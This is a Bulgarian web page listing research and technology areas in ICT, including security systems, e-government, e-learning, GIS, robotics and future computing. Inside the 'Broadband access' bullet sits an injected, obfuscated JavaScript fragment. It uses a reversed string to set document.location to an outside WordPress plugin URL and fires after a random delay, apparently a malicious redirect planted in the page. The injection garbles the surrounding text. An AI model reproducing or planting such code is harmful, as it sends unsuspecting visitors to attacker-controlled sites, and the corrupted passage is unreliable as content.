Технологична класификация

Приложими изследвания в сферата на информационните и софтуерни технологии поставящи важни социални и икономически предизвикателства

 • Информационни и комуникационни технологии (ИКТ) в системите за сигурност
 • ИКТ за иновативно правителство
 • ИКТ за бизнеси, свързани в мрежа
 • Съвместни системи за пътен транспорт
 • Интегриране на биомедицинска информация и приложения за обработване на медицински данни
 • Засилено технологично обучение
 • Достъп до и опазване на културни и научни ресурси
 • Напреднали мрежови (грид) технологии, системи и услуги
 • ИКТ за управление на риска на околната среда
 • Съвместни работни пространства
 • Интелигентна околна среда за живот на възрастни хора и инвалиди (AAL)
 • Цифрово разпространение и интерактивни приложения

Комуникационни, компютърни и софтуерни технологии

 

 • Broadbtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andдостъп за всички
 • Мобилни и безжични системи и платформи,  следващи 3G
 • Мрежови аудио-визуални системи и домашни платформи
 • Вградени системи
 • ГИС (Географска информационна система) - технологии
 • Приложения за електронно обучение
 • Други софтуерни продукти и услуги

Научни и интерфейс технологии

 • Мултимодални интерфейси
 • Системи, базирани на семантични познания и съдържания
 • Когнитивни системи
 • Развита роботика
 • Търсачки за аудио-визуално съдържание

 

Бъдещи и нововъзникващи технологии

 • Напреднала компютърна архитектура
 • Комплексни системи
 • Фиксирани и самостоятелни системи за комуникации